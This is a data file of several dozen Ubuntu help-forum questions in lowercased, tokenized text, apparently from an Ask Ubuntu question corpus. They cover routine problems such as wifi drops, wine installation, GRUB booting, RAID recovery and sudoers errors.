210015	u1 music streaming : is it possible to have album cover art for ogg files ?	just started trying out the u1 music streaming service and so far very pleased . the one issue i have that could be a deal-breaker when it comes time to pay up is that half of my collection is ogg vorbis and i can not find a way to show album art for ogg files . i already tried adding a cover.jpg to the folder and embedding the image via easytag ( works for mp3 but not ogg ) . does anybody have a solution besides transcoding them all to mp3 ? will this likely be supported in future ?
210017	how to debug wifi connection ?	i am using ubuntu 's network manager to connect to a local wifi router . my problem is , that it often disconnects without any visible reason ( router is on , internet connection seems to be working , wifi diodes are blinking ) . i mostly have to disable wifi from network manager , enable it again to get wifi connecting again . plus i am often experiencing network manager trying to connect to my wifi , trying several times but then giving up . i even tried an external usb-wifi card , but with the very same results . my question is : how can i debug this ? which logs should i read to see what is really happening when all of these errors occur - so i can post them here and see how to proceed ?
210025	where can i get vmlinux file for running kernel	i 'm developing several kernel module . also i need some profiling to be done . as all my work is kernel modules , rebuilding kernel seems a overkill . i 've seen kgdb/kdb and oprofile is enabled in default kernel config . so if i can just get the uncompressed vmlinux file , then i can do fine without building kernel . which package provides uncompressed vmlinux ? update : i 've found out how to get debug symbols . its in the systemtap wiki : system tap on ubuntu although the kernel i 'm running does not have a debug symbol package . i guess i 've to update my kernel .
210032	facing problems while installing java	first when i downloaded java from official website i got confused how to install it . then i searched it on software center and i found it . but when i install it , it starts but instantly stops and the line highlighting the installation status in progress tab does n't move forward . then i searched on the internet and tried installing it by terminal , but the terminal said that i first have to configure something that i dont know . it tells me to run this sudo dpkg-configure -a and when i run this command the terminal process stops in the middle and even after leaving it for about an hour it does n't proceed . after that when i want to close the terminal , it says that the terminal is in hte middle of a process , and closing it would interrupt it . so i am greatly confused because even other software , like gimp image editor , are not getting installed . can anyone help me ? thanks in advance .
210033	using gnome-boxes with remote desktop connection	in the past i used to connect to my windows server from ubuntu with remmina ( through rdp protocol ) . i 've recently installed ubuntu gnome remix ( 12.10.1 ) and gnome-boxes and i 'm wondering if i can do the same with gnome-boxes . i 've tried creating a new item in gnome-boxes and entering as url `` rdp : //x.x.x.x '' as i used to do in remmina bit it says that the rdp protocol is not supported . unfortunately , i can not find any manual or documentation listing the supported protocol or giving instruction on how to connect to a remote desktop . can someone help me please ?
210039	ubuntu 12.10 installer does n't see windows 8 partitions	i want to install ubuntu 12.10 after windows 8 but ubuntu i installer does n't even see windows partitions . what should i do ? disk tool in ubuntu correctly recognizes partions .
210040	unity does not start after installing the fglrx drivers	i installed ubuntu 12.10 and at first when i go to check the system information i used to have ( unknown ) on the graphic card section , i used the synaptic manager and downloaded the fglrx , after that i restarted my laptop and now i do n't have any menus , all of them are gone . now i am only using the keyboard shortcuts to use ubuntu . my graphic card is amd ati . what can i do to bring the menus back ?
210042	nvidia settings : overriding anti-aliasing causes delay	i 'm using google sketchup on ubuntu 12.04 with wine 1.4 . it works flawlessly out of the box , but anti-aliasing is causing some problems . i can override anti-aliasing settings using the nvidia x server settings utility , which results in a great-looking image . however , the view does n't seem to update properly . it 's a bit hard to explain , but if i do something ( e.g . zooming ) the changes wo n't appear in the view until i take another action . in other words , there seems to be a delay of one `` action '' . take this example . the mouse wheel is moved one notch to zoom in one step . nothing happens . an object is selected by clicking . the new zoom is rendered but the selection box does n't appear . an empty area is clicked . the selection box appears . is there something that i can do to solve the problem ? could i force the gpu to redraw that view with a certain interval , or is there some other solution ? i really like anti-aliasing , but it 's hard to use when drawing stuff .
210044	what can cause my .profile file to not be loaded when a new terminal shell is initialized ?	there are no errors in xsession and i do n't have a .bash_login or .bash_profile file , so i 'm 100 % certain neither of those is loaded and thus cancels .profile loading . when i rename the .profile to .bash_profile and open a new terminal window , it still does n't load . everything in the file works ( aliases and path exports ) when i load it manually via `` . ~/.profile '' , but it wo n't load automatically .
210048	error when running binary with root setuid under encrypted home directory	i 'm using a vpn script for juniper 's secure access protocol form here , which executes a binary located under ~/.juniper_networks/network_connect/ncsvc with the following permissions : -rws -- s -- x 1 root root 1225424 okt . 25 13:54 ncsvc but when i do , i get the following error : ncsvc > failed to setuid to root . error 1 : operation not permitted moving/copying the ~/.juniper_networks folder to e.g . /opt/juniper ( with the same owner permissions ) , i do n't get the error . in the forum thread at ubuntuforums someone pointed out that it 's probably because i have encrypted my /home and thus a `` problem '' with ecryptfs . how can i fix this ?
210051	muxing h264 stream into mp4	i 've a h.264 stream ( .264 ) . how do i pack ( mux ) it into a .mp4 file ? i know i need to use avconv , but i could n't get it to work .
210054	ca n't install wine ( or ia32-libs ) in ubuntu 12.10 64 bit	as already pointed out here , people seems to have issues with installing wine in the latest version of ubuntu . i 'm suspecting this only happens with 64 bit users . for example , when trying to install wine or ia32-libs with apt-get , i get a lot of dependency errors . doing a sudo apt-get -f install does n't seem to do the trick , neither does using aptitude . the errors i get is normally that the packages depend on some : i386 package , but installing those manually does n't work either because they also have dependency issues ( is n't apt supposed to do this automatically ? ! ) . i also downloaded crossover today and tried installing the .deb manually , but the dependency issues show up there as well . when running sudo apt-get -f install after trying to install the crossover .deb , apt-get wants to purge the following packages : ia32-crossover intel-gpu-tools libdrm-nouveau2 libgl1-mesa-dri libva-x11-1 ubuntu-desktop vlc xorg xserver-xorg-video-ati xserver-xorg-video-intel xserver-xorg-video-modesetting xserver-xorg-video-openchrome xserver-xorg-video-radeon xserver-xorg-video-vmware what i 've tried so far ( and did n't work ) : installing synaptic , reloading my repositories , searching for ia32 and installing ia32-libs . using ubuntu software center to install wine and ia32-libs . using apt-get and aptitude to install all the differend varieties of the wine packages , both with and without the : i386 and -amd64 suffixes in package names . disabling the universe and multiverse repos , run a sudo apt-get update and then re-enable them again . boot a newly downloaded ubuntu 12.10 x64 live usb and try to install all the different packages there . what i 've tried so far ( that actually did work ) : installing 12.10 x64 in virtualbox and installing wine1.4-amd64 . what i have n't tried ( yet ) : boot a newly downloaded ubuntu 12.10 x32 image and try to install wine there ( i 'm just guessing that will work ) . reinstall ubuntu . throw my computer out a window . wine alexander @ cosmo : ~ $ language=en_us sudo apt-get install wine reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : wine : depends : wine1.5 but it is not going to be installed e : unable to correct problems , you have held broken packages . wine-1.4 alexander @ cosmo : ~ $ sudo apt-get install wine1.4 ( ... ) the following packages have unmet dependencies : wine1.4 : depends : wine1.4-i386 ( = 1.4.1-0ubuntu1 ) e : unable to correct problems , you have held broken packages . ia32-libs alexander @ cosmo : ~ $ sudo apt-get install ia32-libs ( ... ) the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch e : unable to correct problems , you have held broken packages .
210055	vgaswitcheroo + ati radeon driver	i want both vgaswitcheroo and ati driver on same machine . vgaswitcheroo is good at powersaving while i also want powerful processing too . most of the time i switch between powersave and performance modes . so can i have different driver for different modes or atleast have a same kernel boot into different graphic driver at boot time ?
210056	cant change niceness even after editing limits.conf	so what i did : in the terminal i typed : sudo su ( used pass ) then typed : nano /etc/security/limits.conf went to bottom and added : user - nice -20 ( with my username not user and i spaced it properly ) then i restarted my comp , but it still didnt work
210063	12.04 on virtualbox -no internet access on guest os	i have windows 7 as my host os which has wired ethernet working . my guest os on virtualbox is ubuntu 12.04 . the problem is that i can not browse . i have : enabled sharing on windows ; have used nat , bridged adapter etc ( all possible combinations ) ; with nat , used pcnet-fast ii ( am79c973 ) combination . ubuntu says `` connected to wired ethernet1 '' but i can not access websites . virtualbox host-only network in the network and sharing center shows that i do n't have ipv4 and ipv6 connectivity . meaning i do n't have dhcp configured . strangely i have dns address correct in the ubuntu properties .
210064	ubuntu 12.10 in wubi boots fine , but grub does not show	i installed ubuntu 12.10 ( 64-bit ) directly from the windows installer . when i start up and select ubuntu from the windows boot manager , it correctly passes the command to grub , but the grub menu does not display - all i see is a blank purple screen . after about 10-15 seconds , the sign-in screen shows up ( which means it booted fine ) . is there any way to force it to show the grub menu ?
210066	lenovo z470 getting hot , after 12.04 install	when i was using windows 7 my notebook temperature was very good , it stayed very cool . after i installed 12.04 , my notebook base is hot all the time , i can not even put my hands on it for a long time . my notebook has a 2nd generation intel i5 processor . i installed jupiter and it shows 72 degrees celsius constantly . anyone got a fix for this ? i do n't want to go back to windows but if i do not find any solution i will have to do it . i 'd be very grateful for any help .
210074	how to check current monitor frequency ?	can i check my current monitor frequency ? is it use any application or only open a applicaton ?
210075	ubuntu 12.04 http connection refused	today all of our ubuntu 12.04 installations have developed a wierd bug . whenever you try to access the internet either in a browser ( chrome & firefox tested ) , apt-get/software centre or wget/curl it throws up `` connection refused '' errors . it can be intermittent ; if i disconnect and reconnect the network it works once or twice then dies . https also appears to work ok , or at least is failing less . the problem is the same across 4 ubuntu machines ; we have mint ( 11 & 13 ) and windows ( server 2003 , xp , vista and 7 ) on the same network which are working perfectly . this is completely ubuntu specific . things i have tried : none of the ubuntu installs have similar non-core packages installed , and none appear to have been updated in the last three days ( the problem started sometime in the last 10 hours ) nothing is reported as wrong in the logs netstat -s ( see below ) reports large numbers of failed connection attempts , this is the only `` error '' i can track down dns is resolving 100 % fine , that does not appear to be an issue ( if i try to hit ips directly they exhibit the same error ) . the one caveat to that is that local hostnames are fully accessible ( e.g . server1.theoffice.domain is accessible but not via its ip ) there are no commonalities in hardware , and the network infrastructure has been swapped out for known working kit i ran wireshark to see if i could snaffle an error there . it all seemed to be a-ok ( i.e . sending out packets properly ) . i did see a lot of ( ack , rst ) packets coming back , but could n't track down if that was a major issue or not . anything i 've missed ? any known issues appearing in the last day or so ? netstat output for tcp : tcp : 3325 active connections openings 3 passive connection openings 2393 failed connection attempts 167 connection resets received 4 connections established 52388 segments received 36962 segments send out 246 segments retransmited 0 bad segments received . 230 resets sent tcpext : 153 tcp sockets finished time wait in fast timer 1045 delayed acks sent quick ack mode was activated 126 times 5 packets directly queued to recvmsg prequeue . 10 bytes directly received in process context from prequeue 36099 packet headers predicted 2718 acknowledgments not containing data payload received 1136 predicted acknowledgments 5 times recovered from packet loss by selective acknowledgements detected reordering 1 times using time stamp 1 congestion windows fully recovered without slow start 1 congestion windows partially recovered using hoe heuristic 96 congestion windows recovered without slow start after partial ack 6 tcp data loss events tcplostretransmit : 1 1 timeouts after sack recovery 10 fast retransmits 5 forward retransmits 13 retransmits in slow start 156 other tcp timeouts 126 dsacks sent for old packets 44 dsacks received 42 connections reset due to unexpected data 30 connections reset due to early user close 8 connections aborted due to timeout tcpdsackignorednoundo : 16 tcpspuriousrtos : 3 tcpsackshifted : 4 tcpsackmerged : 14 tcpsackshiftfallback : 23 ipreversepathfilter : 92 further informations telnet on port 80 has the same issue ( connection refused ) .
210081	how do i use the haskell ghci compiler ?	im trying to install haskell on ubuntu for 5 days , i looked up many sites but never found a solution for my problem so i thought i post it here.at first i tried to install it by using the terminal but it never really worked . so yesterday a friend of mine told me to install it via software center i downloaded it here http : //packages.ubuntu.com/lucid/i386/ghc6/download mirror.informatik.uni-mannheim.de/pub/linux/distributions/ubuntu/ and everything worked but now i have no idea how to start it or the ghci compiler . i hope someone can help me ! ( i have the latest 12.04 ubuntu version )
210082	offline repository or cd source	i have ubuntu 12.04 installed on a physical machine which can not be connected to the internet . the originally iso was downloaded from ubuntu 's official site and burnt straight to cd . from various googling , i 've discovered a way to add a cd to the local repository ( software centre , edit , software sources ... ) but it ca n't pick up any of the packages . equally , i 've tried to find packages on the cd and i 'm convinced they are n't there . i 've also attempted multiple other routes but none of them work ( i 'm unsure if it 's because of the version or not ) . how do i find packages offline ( i do n't mind downloading the repository if it makes it easier ) and be able to install a package with all of it 's dependencies ? heck , if i ca n't do the latter i do n't mind doing it one by one .
210083	can ubuntu partition and format ?	can ubuntu partition and format before installing itself on a dell dimension 4400 whose hd is wiped clean of windows xp ?
210084	does ecryptfs use more disk space ?	i have encrypted my /home folder using ecryptfs . i 've noticed that it uses as 1.5 times the disk space compared to when it was not encrypted . is this problem caused by the ecryptfs and is there a way to deal with it ?
210087	ip tunneling driver	i am trying to use a appgate client on my ubuntu 12.04. some appgate client services need ip tunneling driver to be installed and running on the system in order to work . i have downloaded ip tunneling driver for linux but do not know how start it . does anybody know how to run it ? thanks in advanced .
210089	is it possible to create two gmail web-apps for two gmail accounts ?	i am on ubuntu quantal , freshly installed . i have one personal gmail account and another professional google apps account . i have managed to integrate my personal gmail account to the gmail webapp , but the application is quite useless to me if i ca n't plug the second account too . is it possible to create two webapps , one for each account ?
210090	how to sync loved songs on last.fm with songs in rhythmbox ?	i would like sync my loved songs on last.fm with the corresponding songs in rhythmbox by giving them a particular rating in rhythmbox . how can i do this ? this is possible for other players .
210095	games are playing but very slow response and poor graphics	the graphics memory of my notebook is 2.5 gb , 1 gb dedicated memory . after installing ubuntu 12.04 , i activated the graphics card from applications- > additional drivers . i have dual boot , all high end games are working fine without any issues in windows 7 but games are very slow in ubuntu . the games that i have installed in ubuntu are warzone2100 , 0ad , maniadrive and scorched 3d . all the games are playing but very slow response and poor graphics . i have seen the gameplay videos of these games , they are good esp warzone2100 and 0ad . my questions : how to check the graphics memory ? why the games respond very slow ? please provide the solution to improve it . i love using ubuntu but for games i depend on windows 7.. i do not expect to run high end graphics games in ubuntu but i would like to play warzone and 0ad without any problem . help me . system info : product name : hp g6-1209ax product number : a3v45pa microprocessor : 2.3 ghz/1.4 ghz amd quad-core a6-3400m microprocessor cache : 4 mb l2 cache memory : 4 gb 1333 mhz ddr3 max memory : upgradeable to 8 gb ddr3 video graphics : amd radeon hd 6470m ( 1 gb ddr3 dedicated ) display : 15.6 '' high-definition led hp brightview display ( 1366 x 768 ) hard drive : 500 gb sata ( 5400 rpm )
210098	usb pendrive does n't work	i have a kingston 8gb pendrive , earlier when i connected it to ubuntu , it was identified by the system . but now when i connect it to ubuntu the drive is n't identified any longer . please help me to solve this problem .
210099	how do i get firefox to open attachments without downloading them ?	i have windows xp and kubuntu 12.04 on my desktop . i use gmail and yahoo mail through firefox . if i get an attachment using xp , i know how to navigate to c : /program files/xyz/xyz.exe to open the attachment , and tick the firefox dialog box so that future xyz files , will automatically open in firefox . in kubuntu , the same dialog box appears , but it is not clear how to navigate to the linux eqivalent of xyz.exe . i have to save the file first , when it will be opened on clicking ( provided i have first correctly set systemsettings > fileassociations ) . i would prefer to choose which attachments i save , so need to know the kubuntu folder which corresponds to xp 's `` program files '' . and the file/extension equivalent of xyz.exe . firefox 's help menu does n't seem to have this information .
210100	getting started	i have set up a vm with ubuntu server and i seem to have access to other machines on the local network but i do n't seem to have access to `` outside '' networks . i determine this with ping ( for example ping google.com returns with an address , so dns is working , but there is 100 % packet loss ) . sorry about this newbie question but the installation went so smoothly - now what ? thank you .
210102	why skype does n't work in quantal	since updating to quantal skype does n't work and i get this error when updating : w : gpg error : http : //ppa.launchpad.net quantal release : the following signatures could n't be verified because the public key is not available : no_pubkey f6a071abee5d5ba2 w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/source/sources 404 not found [ ip : 91.189.92.191 80 ] w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-amd64/packages 404 not found [ ip : 91.189.92.191 80 ] w : failed to fetch http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-i386/packages 404 not found [ ip : 91.189.92.191 80 ] e : some index files failed to download . they have been ignored , or old ones used instead .
210103	how to remove non duplicates in libreoffice calc	how do i remove non-duplicate cells in calc ? the purpose is to delete all the rows that contain a value that exists only in one collumn . ie : a b 1 1 2 3 3 5 5 10 7 12 8 9 10 12 here the rows that contain 2,7,8,9 would be deleted edit : i 've been looking at function wizard , the answer may lie in the database category , but i do n't understand most of it .
210104	how to format a usb or external drive in kubuntu 12.04.01 ?	i am aware that similar questions have been answered before for different versions/releases of ubuntu , but i can not find an application to reformat a usb stick in kubuntu 12.04.01 . right-clicking the drive in dolphin does n't give the format option . is it possible on software that comes with the package , without resorting to the terminal or gparted ?
210110	a basic doubt about building from source	suppose i installed a debian package using the ubuntu software center , and then suppose i wish to install the same program by compiling it from source . then can i simply proceed by installing the same program compiling from source ? will this replace the previous version installed via deb package ?
210112	initial root password and display ?	i would like to cleanly shut my system down but the response from 'shutdown -p now ' is that i need to be logged in as root . i installed the 'root ' command but i get an error message that 'root : can not figure out display , set it manually ' . since this did n't work i tried logging in as root ( user name ) and i realize i do n't know the password . so i have two questions . one , on initial installation what does the root password become ? two , what do i do about the display problem ?
210115	raid device name and uuid changed after power failure	after a power failure , my machine comes up but does n't mount the raid disk because it is n't found ( correctly ) . using mdadm -- examine on the partitions making up the raid device , i found that they are there , but with a different uuid and a new name after the power fail . the new name is clearly a bogus string from some other memory/disk location before the crash . i do n't think it had a name before because it would previously auto-assemble on /dev/md0 . linux actually auto-assembled the raid device , but i did n't notice at first because it was on a new device name ( /dev/md/new_name ) , and had a new uuid . i was able to manually e2fsck check it , mount it and all of the data is there and good . now i want to restore it to the old device , and old uuid . i know how i can do this by destroying it and recreating it , but that requires backing up and restoring the data . actually i already have a day-old backup , so i could skip that part , but this is a really big drive and even the restore will be many hours . how to fix this the quick way : fixing the raid superblock ( s ) without touching the data ?
210117	how to enable online status in the messaging indicator without an online account ?	when you do n't want to add an online account in 12.10 , the global online status is not present in the messaging indicator applet . nevertheless , i would like to use the global online status switcher because the skype-wrapper has the handy option `` use global online-status '' . is there a way to enable it ?
210123	virtualbox vnc options	i have been looking for a way to connect to my virtualbox vm guest by a vnc client . by that i mean , not installing a vnc client/server on the vm , but as an addition to virtualbox ; the same way as vps providers do . i have searched for this , nothing came up . how do i do this ?
210137	e : unable to locate package pvrg-jpeg	i have installed ubuntu 12.04 lts and trying to installed the following package : sudo apt-get install pvrg-jpeg when i run the preceding command , i get the following : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package pvrg-jpeg how can i install the package ? thanks .
210142	ubuntu live cd hangs on boot	i have burned 11.04 to a cd to set up dual-boot . but the ubuntu screen just stays with the dots below the name and nothing else . i would really like to try it out . any help would be appreciated .
210155	ubuntu 12.10 installation . hit or miss booting	i just recently downloaded and installed ubuntu 12.10 . i also completely wiped the laptop . the ubuntu os will only boot part of the time but never on the first time . always , the first start up will automatically go to a purple screen and stay there . at first i waited for 45 minutes and nothing changed . once i held down the power button to turn it off , i turned it back on to see the asus screen followed by the grub menu . i can select `` ubuntu '' and then there is a white box blinking in the top left corner . then , it will either keep blinking or transfer to the ubuntu loading screen ( everything works fine if it gets to the loading screen ) . this has never happened before with prior versions of ubuntu . any ideas are helpful . thanks !
210165	12.04 unable to boot on /sde , upgrade-grub and boot-repair failed	my problem is i 've 4 disks in a raid array listed as sda , sdb ... sdd and grub 2 refuses to boot on /sde ( the 5th disk , standalone and containing a clean install of 12.04 lts ) . i tried all solutions but all fail . ( live cd/usb with grub-setup , also tried repair-grub , and tried also in the `` grub rescue '' set prefix= etc - no disks appear ) . i also tried to deactivate the raid array in the bios , but i 'd rather not destroy it , and i did n't find a way to [ reorder ] make the standalone disk as '/sda1 ' ( this would satisfy grub ) . in the bios , the would-be /sda is the only bootable hard disk ; it ends up as /sde and grubs complains . i 've made repair-grub issue a pastebin . i always end up in grub-rescue and i 'm stuck . i need ubuntu to boot so that i can add the device array handler for my disks . i ca n't switch the disks and i ca n't disconnect the sata raid controller . i need : ( a ) a workaround so that grub starts on /sde ; or ( b ) a way to change the order in which ubuntu sees the disks , at boot time . i could then provide grub with a /sda1 . thanks a lot . -- - addendum it 's not the same problem as booting ubuntu from raid . my raid array serves only of data repository windows had no problem with this configuration -- - addendum up 2 months after , i 'm now still stuck . no grub/ubuntu guru around ? the data clearly show that only /sde has grub installed . nevertheless , grub is unable to boot as soon as the raid array ( /sda../sdd ) is mounted . i waited two months in hope a patch would fix grub in such a situation , but nothing comes up and i 'm fed up being cut from my raid array . my only option left is to reinstall windows for my server ... at least it 's able to boot while i have my data connected in its raid array ... it 's a shame : my everyday computer would be on ubuntu and my server would have windows ... thx
210168	moving folder and subfolder to another path	i need to mve my folder with many subfloder contents to another path . i 'm using putty and this is what i tried mv -r fromflderpath tofolderpath where am i doing wrong ?
210169	slow internet / ca n't change brightness on 2010 macbook air running 12.10 ubuntu	the title really says it all . i have n't been able to change the brightness of my monitor since putting ubuntu on it . i started off with 12.04 and then decided to see if 12.10 would fix the issue . the internet is also a fair bit slower than i am used to , especially when downloading . apart from these two issues , everything goes very smoothly . if anyone could offer any advice or solutions , i would be very grateful .
210173	ubuntu one - files api - cloud - more detailed info somehwere ?	i am just starting on a mobile app for ubuntu one , and i 'm reviewing the info at https : //one.ubuntu.com/developer/files/store_files/cloud i find the information a bit lacking though . it 's a nice reference , but for someone not familiar with it , i had to goggle search to find out what a `` volume '' was exactly ( its kind of obvious , but never hurts to know the specifics ) there 's also things like : get /api/file_storage/v1/volumes return a json list of volume representations , one for each volume . a volume is a synced folder , or the ubuntu one folder , owned by the user . note that all volume paths begin with ~ . : ... but there 's no such thing as a json `` list '' . does it mean array ? and other things ... so i was wondering if here existed another page with more detailed information . maybe some sample request / responses or something ? i could just write a little proof of concept app to answer some of these questions ... but i prefer not to unless i have to . thanks
210177	serial port terminal > can not open /dev/ttys0 : permission denied	i had windows xp on this box and it failed . thinking it was corrupted os i tried to reinstall , and it failed . but then i tried to install ubuntu , and i could not run it from the usb or from the hd . did the mem test and found out one of my 512mb sticks ( had 2 ) failed . i removed the bad one and was able to install ubuntu but it was sluggish . i was trying to quickly setup my packet radio for hurricane sandy . downloaded the serial port terminal and was able to get some use but the system kept locking up . so installed xubuntu next to it , planning on running out the next day to get ram for the box . put xubuntu on and now i am getting the following error with serial port terminal . : can not open /dev/ttys0 : permission denied i would like to be able to use serial port terminal , or equivalent with xubuntu so i can use my kpc3 packet terminal , connect to the com port on the back of my computer . any ideas ?
210179	software raid5 recovery	i 'm very new to ubuntu and linux in general , so please forgive my noobness . i 'm running an ubuntu server , where the os is installed on a ssd drive . in addition , i have 4 other drives in a software raid5 . one of these drives failed . i recently upgraded to 12.10 , and after doing so , the system refuses to boot , and gets stuck after choosing what installation to boot . i have replaced the failed drive with a new one , and now i 'm trying to recover the system by booting from a usb installation drive , but i 'm really stuck on what to do . some questions . 1 . how can identify my ssd drive from the other drives , in case i will try a fresh install 2 . how can i rescue my failed raid ? any help is greatly appreciated , thank you !
210182	how to check which terminal emulator is being currently used ?	i have gnome-terminal and guake installed . i want to give different startup messages to be displayed on these terminal emulators as they start . what code should i write in .bashrc so that this is achieved ?
210183	characters missing in console	i am working on implementation of an sic-xe assembler with my friends . those guys are using windows and codeblocks while i am using ubuntu 12.04 and codeblocks ( both using version ( 10.05 ) . this is a piece of code used to print values from an input file . it is working fine in windows but when i use it on linux my console doesnt print the first four charcter . this is my output . can anyone tell me the reason for this .
210185	ubuntu software center bought software stay on account ?	sorry for the long title . my question is basically if my ubuntu software bought from the software center will be left to download if i 'm logged in on another ubuntu ( other harddrive ) ? or do i need to make a copy of my other ubuntu and copy the software that way .
210186	installing gui on ubuntu	i have installed a ubuntu server and executed the command sudo command to install the ubuntu-desktop . now when i log in i get a graphical prompt for my password but after i login it seems to take alot of time . i have heard that something call gnome is faster . how do i install it . again i apologize but i am relatively new to ubuntu but not linux . thank you .
210189	is lxde in 12.04 lts or not ?	this question is n't more of a help me question , its just that i 'm curious and it affects my computer . i installed the powerpc version of ubuntu minimal on my ibook g4 and i was planning on putting lubuntu on it through sudo tasksel , but i remembered that the 12.04 lubuntu isnt lts , so my question is , is if i install lxde through the ubuntu minimal installer , will it be lts or will it be pretty much a lubuntu install ? thank you for your responses
210192	how can you add an item to the right-click menu in nautilus ( without nautilus-actions ) ?	i 'm trying to give my image uploader some kind of rightclick- > upload functionality . currently i use the nautilus-scripts folder , but that puts the menu entry behind an unapparent `` scripts '' item . i 've tried looking it up but i can only find people referencing nautilus scripts or nautilus actions ( which is n't what i want for packaging ) .
210193	unable to use/locate sudo	i am using ubuntu 12 and am unable to use sudo anymore ( it was working a few days ago ) but apparently got corrupted somehow . below is the error i receive when i try using sudo . sudo : unable to stat /etc/sudoers : no such file or directory sudo : no valid sudoers sources found , quitting sudo : unable to initialize policy plugin besides reusing the ubuntu live cd , is there anything else i can possibly look into in order to fix this ?
210195	how to update from gnome 3.4.1 to 3.6 ?	i use ubuntu 12.04 with gnome 3.4.1 . i 've tried to upgrade to gnome 3.6 to no avail . i added this to my /etc/apt/sources.list file : deb http : //ppa.launchpad.net/gnome3-team/gnome3/ubuntu precise main then i ran sudo apt-get update sudo apt-get upgrade then restarted the system . but when i run : gnome-shell -- version it continues to print gnome shell 3.4.1 what can i do ? i need to upgrade to 3.6 in order to be able to use an extension that allows the app switcher to only switch between apps in the current workspace .
210198	ubuntu software center downloads something when installing from a .deb file	i wanted to install winusb from http : //congelli.eu/prog_info_winusb.html i downloaded the deb file , the latest was available for precise ( i amrunning 12.10 ) i opened the .deb file ( 390 kb ) in ubuntu software manager and clicked on install . then i switched to the progress tab and saw this . usc showed that it was downloading data of size 3.9 mb . can someone explain ? was usc just downoading the latest updates and just showed that under the current operation ?
210199	`` unable to get exclusive lock '' when upgrading from 12.04 to 12.10	i have tried the suggestions to find other package managers running , but there are none . i have tried rebooting . i consistently get the same error message . any other suggestions ?
210201	console version of sysinfo	is there a console , text-only version of the sysinfo program or other similar utility ? i am mostly interested in high-level info like ram and cpu .
210210	pkg_config_path environment variable	consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . what does this mean ?
210213	can i open excel .xlsx files with libreoffice calc ?	my colleagues have lots of microsoft spreadsheet documents . i am using libreoffice 3.5.4.2 . without changing / converting / renaming / touching the documents at all , is there a way i can open ( and hopefully also make changes to ) these documents ? right now it seems i ca n't open doc 's of that type using libreoffice calc . i am in a corporate environment where i am the only linux user and asking for a company change in procedures is not very practical .
210220	live cd wo n't start with uefi	i 'm trying to dual boot my windows 8 machine with ubuntu 12.04 but i can not even get to the live cd under uefi . i 've already set my uefi boot loader to load from the dvd drive before anything else but it keeps on loading windows 8 first thing . i 've checked that the ubuntu installer i am using is working by setting the bios to legacy boot ; under this setting , i can get to the live cd but it can not detect windows 8 -- -something i do not want to happen . just for the record , my boot order is as follows : atapi cdrom : hl-dl-st dvdram gt51n usb cdrom : usb fdd usb hdd hdd : toshiba [ serial number ] network boot-ipv4 : network boot-ipv6 windows boot manager has anyone ran into the same problems as me for uefi ? what am i missing here ? post-resolution update : in a rather embarassing turn of events , it appears that the ubuntu installer i am using is not even 32-bit . there is no such thing as uefi for 32-bit .
210222	ubuntu 12.10 laptop temperature	i 'm using a laptop with a dedicated graphics card with ubuntu and windows 7 dual boot . windows 7 idle temperature the windows 7 idle temperature for cpu is 51°c average , and gpu is 46-48.5°c . windows 7 loading temperature when in load , the cpu temperature varies between 55-61°c , and gpu 49-51°c max . ubuntu idle temperature cpu : 54°c gpu ( ati radeon , proprietary driver installed ) : 50°c ubuntu load temperature cpu : 58-69°c gpu:53c max . is it normal ? if not is there any solution ? note that i’m using jupiter , latest graphics driver , grub tweaks etc .
210223	dns error using google chrome , mozilla firefox in ubuntu 12.10	hello i have recently installed ubuntu 12.10 and i love the interface . however i am disappointed that i can not access the web . i my wired and wireless connections are present but when i try to connect to the internet using google chrome or mozilla firefox i receive a dns server error ? i am a novice to intermediate geek type so this is kinda foreign to me . please make it simple or basic for me to understand how to fix his problem . it may even be something i have overlooked . any help you can provide would be lovely . ciao , thomas
210225	ubuntu server on a vm ?	i have installed ubuntu server on a vm and given it 100 gb of disk and 2gb of ram . i also installed gnome . my primary reason for the installation was to install a bunch of different nosql databases and check them out . since my `` normal '' platform is windows 7 as was recommended in `` seven databases in seven weeks '' it seems easier to have a vm running linux than having all the utilities to make windows look like linux . anyway now that i have it installed i am finding that the apps run from the gnome shell are very slow . maybe it is just gnome or ubuntu-desktop but the applications seem very slow . if the slowness is attributed to the gui how do i remove them ? once i remove them how is the best way to install various app software ? as the only reason that i installed the gui stuff was to be able to browse to a site and download . if that is possible without the slow gui then that may be one other reason to remove gnome and ubuntu-desktop . sorry if these questions are newbie type questions but as linux is not new to me , the whole ubuntu distribution is . thank you .
210229	ubuntu 10.04.4 - time length and support	the end of life of official support for ubuntu lucid 10.04.4 is 2013 . personally , i 'll stick to 10.04 and i wo n't leave it at all . have something magic that even unity ca n't replace it . can canonical provide ( with payment ) , a disk that will contain all data for lucid . all universe . etc ... ? and where i can buy one ?
210231	xubuntu 12.10 window tiling shortcuts	to align a window to left/right/top/bottom half of a screen with mouse you should go to 'settings editor ' - > 'xfwm4 ' and uncheck 'wrap_windows ' property . now you can drag window beyond the edge of the screen to tile it . but what are keyboard shortcuts for such a tiling ? xfce 4.10 has that functionality , but i ca n't find keyboard shortcuts for it .
210239	recovering from a ubuntu freeze but keep programs running ?	on my system , ubuntu freezes occasionally . the entire display becomes unresponsive - the mouse still moves but nothing happens on click , and with the keyboard i can press ctrl+alt+f1 to go to a login prompt . when i log in from the prompt , it appears all my programs are still running as normal . yesterday for example i was converting some videos and running top showed the avconv process still running . i left it going for several hours and eventually it had completed the task perfectly . ( what actually appeared to cause the freeze was opening transmission from the notification area , but killing the process from the command line did n't make the system responsive again . ) anyway , after reading through this question it seemed like restarting the gui was the way to go . so i ran sudo service lightdm restart but it closed all the programs down when logging out . so for future use , is there a way to restart only the gui and go back to exactly where i was ? everything else in the linked thread is about rebooting or restarting the os .
